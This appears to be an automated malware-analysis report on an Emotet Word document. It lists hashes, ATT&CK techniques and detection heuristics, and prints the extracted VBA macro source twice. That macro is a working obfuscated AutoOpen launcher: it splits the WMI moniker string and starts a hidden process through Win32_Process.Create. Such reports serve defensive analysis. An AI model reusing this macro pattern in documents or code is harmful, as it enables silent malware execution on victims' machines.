Emotet Office (OLE) malware analysis — malicious · 88bd4e527a7ce0e3

MALICIOUS

Office (OLE)

129.5 KB Created: 2019-05-06 13:52:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: f535d442feac73ad6ec73845525aad1a SHA-1: 7a92e8c0b0f39b575d3d901d05ad7b3ad159ad82 SHA-256: 88bd4e527a7ce0e367cc56a9c490b803273960a3cf0fc17e5ce8447ab2eede88

242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1137.001 DLL Search Order Hijacking T1218.011 Signed Binary Proxy Execution: Rundll32

The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that utilizes WMI to launch a process. This is strongly indicative of the Emotet family, which commonly uses such techniques to download and execute further stages. The ClamAV signature further confirms this attribution.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6963217-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6963217-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3710 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3710 bytes
SHA-256: `6d4fe8d06cc927eb1d1c16cac90e810765fbc8ebe4a1f25fa83287ac59a3f9f2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "d426078" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "K20_40" Attribute VB_Base = "0{2F84D7F1-1265-4D74-899B-85568CE8D59D}{CC1E96F1-BE48-427E-8A81-530F5FF6F31B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "S_7875" Attribute VB_Name = "S31__90" Attribute VB_Name = "Z6146_" Attribute VB_Name = "l678094" Attribute VB_Name = "N94776" Attribute VB_Base = "0{10086F52-2903-4676-BEC0-D07BB8D69D0F}{A1B888AD-0D1D-4AB3-BE66-E4C02304E6E9}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "P324_802" Function r3073_(X977412) While b24440 And 459520417 Wend While a5_45897 And 532484408 Wend Set r3073_ = CVar(X977412) While n050064 And 376973578 Wend While W12396 And 576509845 Wend End Function Sub _ autoopen() On Error Resume Next While U_92588 And 17703731 Wend While i08528 And 552808729 Wend Call K_657609 While P001748 And 239949978 Wend While s675_4 And 796560502 Wend End Sub Attribute VB_Name = "j8944381" Function K_657609() On Error Resume Next While D819_93 And 529237306 Wend While z0279508 And 901946923 Wend While a15058 And 353081439 Wend j18_9397 = K20_40.w56049 + N94776.E0122054 + K20_40.w56049.ControlTipText + N94776.v5395367 + K20_40.w56049.PasswordChar + K20_40.w56049.ControlTipText + N94776.H8_826_8 + K20_40.w56049.ControlSource + K20_40.w56049.PasswordChar + N94776.B_076730 + K20_40.w56049.PasswordChar + N94776.z689339 + K20_40.w56049.PasswordChar While w_26193 And 424890800 Wend While f292866 And 301601492 Wend Set K1087_6 = r3073_(GetObject("win" + _ "mgmt" + "s:Wi" + "n32_Pr" _ + "ocess")) While D14213 And 813392683 Wend While k__55_88 And 288509744 Wend While V6024269 And 899771316 Wend K1087_6.Create i7361907 + j18_9397 + w16814, G7017_1, j80773, s0054472 While H112761 And 269341593 Wend While V_561862 And 943534848 Wend End Function Attribute VB_Name = "T1897341" Public Function j80773() While H46497 And 381588965 Wend While w1_2440 And 390300541 Wend Set j80773 = r3073_(GetObject("win" _ + "mgmt" + "s:Wi" _ + "n32_Pr" + "ocess" + "S" _ + "tartup")) While K098083_ And 303981355 Wend While O9051830 And 371507092 Wend u5__38 = vbError - vbError While D3508623 And 884250380 Wend While A474829 And 59916080 Wend While I5454002 And 119611633 Wend With j80773 While v_9505 And 36596709 Wend While q5408_65 And 805412601 Wend . _ ShowWindow = u5__38 + u5__38 + u5__38 + u5__38 + u5__38 + u5__38 + u5__38 While M514349_ And 671154455 Wend While s8931__ And 275610145 Wend End With While q0506537 And 746966759 Wend While h699130 And 596417525 Wend End Function

SHA-256: 6d4fe8d06cc927eb1d1c16cac90e810765fbc8ebe4a1f25fa83287ac59a3f9f2

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "d426078"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "K20_40"
Attribute VB_Base = "0{2F84D7F1-1265-4D74-899B-85568CE8D59D}{CC1E96F1-BE48-427E-8A81-530F5FF6F31B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "S_7875"

Attribute VB_Name = "S31__90"

Attribute VB_Name = "Z6146_"

Attribute VB_Name = "l678094"

Attribute VB_Name = "N94776"
Attribute VB_Base = "0{10086F52-2903-4676-BEC0-D07BB8D69D0F}{A1B888AD-0D1D-4AB3-BE66-E4C02304E6E9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "P324_802"
Function r3073_(X977412)
         While b24440 And 459520417
      Wend
         While a5_45897 And 532484408
      Wend
Set r3073_ = CVar(X977412)
         While n050064 And 376973578
      Wend
         While W12396 And 576509845
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While U_92588 And 17703731
      Wend
         While i08528 And 552808729
      Wend
Call K_657609
         While P001748 And 239949978
      Wend
         While s675_4 And 796560502
      Wend
End Sub


Attribute VB_Name = "j8944381"
Function K_657609()
On Error Resume Next
         While D819_93 And 529237306
      Wend
         While z0279508 And 901946923
      Wend
         While a15058 And 353081439
      Wend
j18_9397 = K20_40.w56049 + N94776.E0122054 + K20_40.w56049.ControlTipText + N94776.v5395367 + K20_40.w56049.PasswordChar + K20_40.w56049.ControlTipText + N94776.H8_826_8 + K20_40.w56049.ControlSource + K20_40.w56049.PasswordChar + N94776.B_076730 + K20_40.w56049.PasswordChar + N94776.z689339 + K20_40.w56049.PasswordChar
         While w_26193 And 424890800
      Wend
         While f292866 And 301601492
      Wend
Set K1087_6 = r3073_(GetObject("win" + _
"mgmt" + "s:Wi" + "n32_Pr" _
+ "ocess"))
         While D14213 And 813392683
      Wend
         While k__55_88 And 288509744
      Wend
         While V6024269 And 899771316
      Wend
K1087_6.Create i7361907 + j18_9397 + w16814, G7017_1, j80773, s0054472
         While H112761 And 269341593
      Wend
         While V_561862 And 943534848
      Wend
End Function


Attribute VB_Name = "T1897341"

Public Function j80773()
         While H46497 And 381588965
      Wend
         While w1_2440 And 390300541
      Wend
Set j80773 = r3073_(GetObject("win" _
+ "mgmt" + "s:Wi" _
+ "n32_Pr" + "ocess" + "S" _
+ "tartup"))
         While K098083_ And 303981355
      Wend
         While O9051830 And 371507092
      Wend
u5__38 = vbError - vbError
         While D3508623 And 884250380
      Wend
         While A474829 And 59916080
      Wend
         While I5454002 And 119611633
      Wend
With j80773
         While v_9505 And 36596709
      Wend
         While q5408_65 And 805412601
      Wend
. _
ShowWindow = u5__38 + u5__38 + u5__38 + u5__38 + u5__38 + u5__38 + u5__38
         While M514349_ And 671154455
      Wend
         While s8931__ And 275610145
      Wend
End With
         While q0506537 And 746966759
      Wend
         While h699130 And 596417525
      Wend
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.